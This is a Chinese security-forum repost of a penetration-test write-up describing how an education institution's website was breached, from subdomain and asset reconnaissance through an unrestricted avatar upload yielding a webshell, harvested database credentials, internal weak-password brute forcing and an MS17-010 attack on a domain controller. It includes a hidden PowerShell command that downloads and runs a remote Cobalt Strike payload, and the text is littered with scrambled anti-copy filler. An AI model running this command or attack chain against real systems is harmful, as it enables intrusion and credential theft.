中国网络渗透测试联盟

标题: 渗透实战 | 从外网直接打到内网全过程 [打印本页]

作者: admin    时间: 2024-3-1 19:41
标题: 渗透实战 | 从外网直接打到内网全过程

8 @' ^2 p( v- ]9 d$ `. c9 N+ E/ a! F 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路 1 y+ u; b# f3 B: B, u* a' w% w

5 D: `* S s! w8 }0 f

: W# l0 Y$ z' J  9 N0 f, w0 ~) E- D

0 O) D0 Z y5 z1 A; G0 Q

9 y; M6 E; D; |! b X, } 正文6 w. s2 x, w3 ~5 T) o" \/ O

4 ]) L& `. O2 Y1 L8 v/ e

9 i3 Y1 v1 k* g   " A" r3 _9 m$ b- ? |. H/ s' f

; P$ o! h7 I( b

6 n3 Q& m* Z% W4 W5 X6 V C 目标:www.xxxx.com(一家教育机构)
0 D' S2 K8 R x/ |! d+ ?+ o# r' l" Q
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
5 D5 u" e+ Q$ u! d. K9 v7 a

% W' d& t% ^) E

7 G3 H( `) g, X vshapes=* e( i" ]" V( `6 g c8 Z/ ^. q7 C

+ e' H6 U8 S4 M: S& j6 q( e ]6 @; s

% o! x% {, q, U( ~6 L* D 进行了简单的信息搜集
g" o3 m7 E/ P1 V9 U- Q( g; p
$ S; o& \6 i5 R
! O$ w1 s- g) U H

. r- U* \/ d6 ]0 ]' W# J6 w- ]3 x% |

" x: m4 |! R+ \9 c/ t 子域名搜集 3 Y: X& k- ^% Z

, T0 K N8 i' j0 _

4 e. H6 @! T. Y6 c8 ?/ c j vshapes= % B$ U9 [) R& ]: z

/ s8 y0 Y9 n& ^# b! k

4 n- }7 e6 M9 L# |" t! ^" p1 q fofa找资产
& ]( X: l- G& a2 I8 y$ Z" {
- W3 P0 N; ]7 v: I
" T# B2 X- E% O/ T3 y

7 O. ^) _5 `) w" C- }9 o* l" [; d

9 k2 N$ J' F& @ d5 ^* h2 @ vshapes=6 `" E3 M, d5 y o

& m1 I8 p4 f$ z( y' m& N( h0 I; ?4 d

5 O- L2 {# B) e* q 一共七个资产。去重之后只有两个。
: y* ~" G' h" u- j
: K- p6 s: N1 _0 f l; n
! g4 X# J$ @ z( T2 u$ L) A3 k( h4 _

. I2 I; E! k [ z# V6 g) P) h

' z, v# Q0 }- f9 o( I 目录探测* e# i9 G- b* g9 F" P: {

' { @/ j5 V {* Q2 n

: }. f( y/ I1 k N! K3 E' n$ } vshapes= " z& \5 J! Z) o/ _+ M& H% e" R% u

" K8 \8 j2 r, @! B0 \

* h, d7 B3 |' A& x 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
* e" G+ S, V( M3 |" ~
% w# l7 B8 o5 T0 ?
3 L5 S( F3 E" C1 `4 W2 F

9 c6 M* G+ H" Z: N+ h2 H& D0 R

3 E/ i- h3 Z( W 我又尝试了通过修改返回包来绕过登录界面 3 U8 q1 q" a% V. z0 }

" R* X8 v# {& \5 d8 t' A

! r. h6 v) v* {' S vshapes=- Y# M1 d( i6 w+ y/ a; C+ [

; R: L3 V+ t& r0 O& Y G6 R0 S

# T' |0 x1 I- F$ z9 V! G$ S! g1 T5 D6 D 还是不行,尝试注入无果* t- O. u# B b

) R7 w; F8 U$ J. U

z; S3 I- w* [# z vshapes=" I- [; H' R; h' l' p

* ?. q( `8 d ] u$ W8 V t* c' k

. G1 ~! L" y4 l$ W3 u ] 不过我目录探测出了一处Spring信息泄露
: O1 q0 O4 G( L$ q2 J J/ h
' N5 M8 I& f. G- k4 \8 x4 l. O
6 B* K1 V) i2 `1 \3 N

, F2 G# p5 i- t2 E$ N! v

. y$ j& o1 o6 z, Y5 U" U. l vshapes=* R9 Z. k# x: _1 E, l

m) Z* t% ?! Z6 V0 r" D

/ ?. d$ X" y5 R! K7 s 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录" H1 s/ J1 O! o% G6 F D" f/ E

* N$ O3 {6 H6 d. h j2 u

3 I+ p( ~. f6 i5 h4 m vshapes= ( D6 s, Y6 }2 M' W% ?$ n: x

# A( R f/ X/ i* }( y1 U: U& w/ d

6 ]* Z, _1 y: Y4 j/ v* g5 }5 V 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。 ) m4 U& d2 ~% k% M

, p$ B4 M% ]9 s0 `" }1 c

) ^4 Z1 B. \3 \/ B vshapes=7 e. l1 r" T' y

$ ~% R$ i2 V- ]' Z$ l

4 \7 l5 U& V/ I- L u8 u 获取有些师傅到这一步就手机抓包电脑测了。 . G( a2 h+ Q* Y$ K0 C

; O# }: |& D0 {( z7 K' f1 w! U

" J& C. |3 x* c. `% F; W Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。 ) Z( `9 U& q& }1 L8 U

4 F6 W4 ]. q( Q, I

' U6 x O% V0 q+ z$ j3 R9 H& v, ]% m 其中在一个公众号发现了小程序,可以进行注册。 1 H$ ?7 G4 b! h* L9 h1 O$ A

B' ?3 c5 S- w3 s

$ J9 ?& E! J6 L# X* M0 r 看到了头像上传,尝试上传获取WebShell( ^4 k8 m& G) v

# D; |( H( ~9 f" U

5 E, `: P% Z$ r$ q vshapes= & t; R4 V" V* s. e9 K8 j$ K" j( B" B

" I* q/ y, S* l2 S

, G5 ~# H& E. u" ~+ Q. C 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问0 j7 ]/ C( p0 T4 b

$ A7 U1 o6 U8 h1 M' P0 k

6 p }2 a) M) X5 Y6 k% B" X0 w vshapes= * y" C- b5 q: I' s! w; W# d0 r8 O

2 _5 Q: C$ A& l- [# a

8 h& k, Z! X& r, ~1 c 然后上了大马 4 ^* [! [5 V# E8 ~: t( Q

1 n- A, a/ I( ?6 s$ O

; `( R M# U% H vshapes= : `) {* o- n5 C9 M

, a! Q( u* A1 @; b

, W6 ?) }& j% Q( |0 l' B vshapes= 8 E$ b" D2 V) l$ X; n

4 Z* A8 M$ _! b0 b4 r' Q% w

) h$ A2 y; d2 C 通过翻找文件发现数据库账号密码 ; _2 I6 b9 Q/ i) g, ~

+ Q2 o6 L8 T( ]4 T0 z

e6 p, X9 P d6 ]' d2 g vshapes= - ]$ e+ K8 y$ J* w5 ?; o* g

* u$ R N- Y6 K$ W; S1 r7 Y6 d

8 g9 i2 C$ _- {1 f/ } U& a --内网渗透 - O' h# V, \+ G( V( s" ~. J

/ T4 s a# Q9 J7 o

# \ M; R! v) K7 H( z! W: A 直接通过powershell执行 cs上线 8 u R# X- |5 Z! C4 E2 b+ C

. X* i% g! a9 ^7 g" g

& p1 q. O4 Q7 z4 \ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))" , T8 g; L; m: ~* g9 r0 R3 \

! r9 B% w& U6 d6 W

& L* D5 I4 o+ k2 G+ _ h& C1 ^! y vshapes=' h3 h$ P. w1 a

# {7 u% \. w: F; ]# R9 }7 y, v4 j

, u/ l; ` a$ R9 s7 X4 N 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破 1 t# x6 h+ a$ U, B F

5 S: A& a) V0 c) a" V! n; c

) Q) A0 W9 v* h1 G, j1 B* ?) N vshapes=! Y& f" X/ I+ {, U/ s

- J9 I+ ? _( h3 w

, O9 I! s+ g% l 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
% [. J7 ~1 A! k2 `6 u/ e" X
* z3 Q6 W# p% U
! N; s1 B) z8 g. ^9 B" S
3 g% Y- v: N/ N" s& z3 K. S. J

+ R* g$ L- p4 a( N: P* U

% M2 [( q) t& ~" s5 o5 C vshapes=6 J9 a/ _; q( o2 X" D. W

) @$ W% ?" r6 s& c' j- Y& \

/ V! o. b! ^$ J9 J 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
2 n3 D8 z) B3 T4 o
' w/ Z6 B$ T0 v4 @) P* h
d( Q! R( x9 Z7 a8 V* e

7 ^8 }, \1 S+ s+ J# x

+ U9 A; W6 X! Z4 F$ Z0 Y1 f: L vshapes= % a& e" k5 n5 V% g# {

( |: R/ } D; \2 K8 y T+ ?% t

3 X* g" t* E# e* ?
7 I2 L! x K4 T! \) V( F1 m" y
6 b) U- x. d) [, S
5 v9 h" d* {& y( p9 {0 d

+ D" Q& h* w- d* p

$ X% F) |: |2 M% W& I/ r9 ~   ) A& a% @: k. m

5 ^+ h( D4 |4 a" g4 X2 S

! h7 c( c6 ?$ s9 |; B; T. u/ |$ G# K 小结 5 ~# j8 F7 T' Q1 x8 d! |% Z4 c3 q

; o: C: m1 I$ e, Z+ b. M

. p& R6 Z4 t) N( u5 ~   # Z( k( F2 `2 D, f

7 A) D6 q1 ]- D! S$ S% Y% z+ Q9 e& t

& z5 a, y# R! P. ]& U 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路! $ T2 K& H9 B9 z/ t

7 c* `; H1 O) m! M; Q; U2 _

2 ~& g6 e, _: h9 D! }8 Q4 X, ]* ?: z  0 `+ K4 ]! m; w$ u7 p- H; ]8 ^

& `9 W2 v4 I5 C9 q; x2 e O |) e! k

) _! {" z1 N% |* V% {* Q, _0 c' y* \ 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html3 E H5 x# D* F9 ^3 s

2 q7 _* [% U: i% ?( l

+ w2 @/ X: A7 i" w/ ?   % B$ F. q; a) Q! L7 t






欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2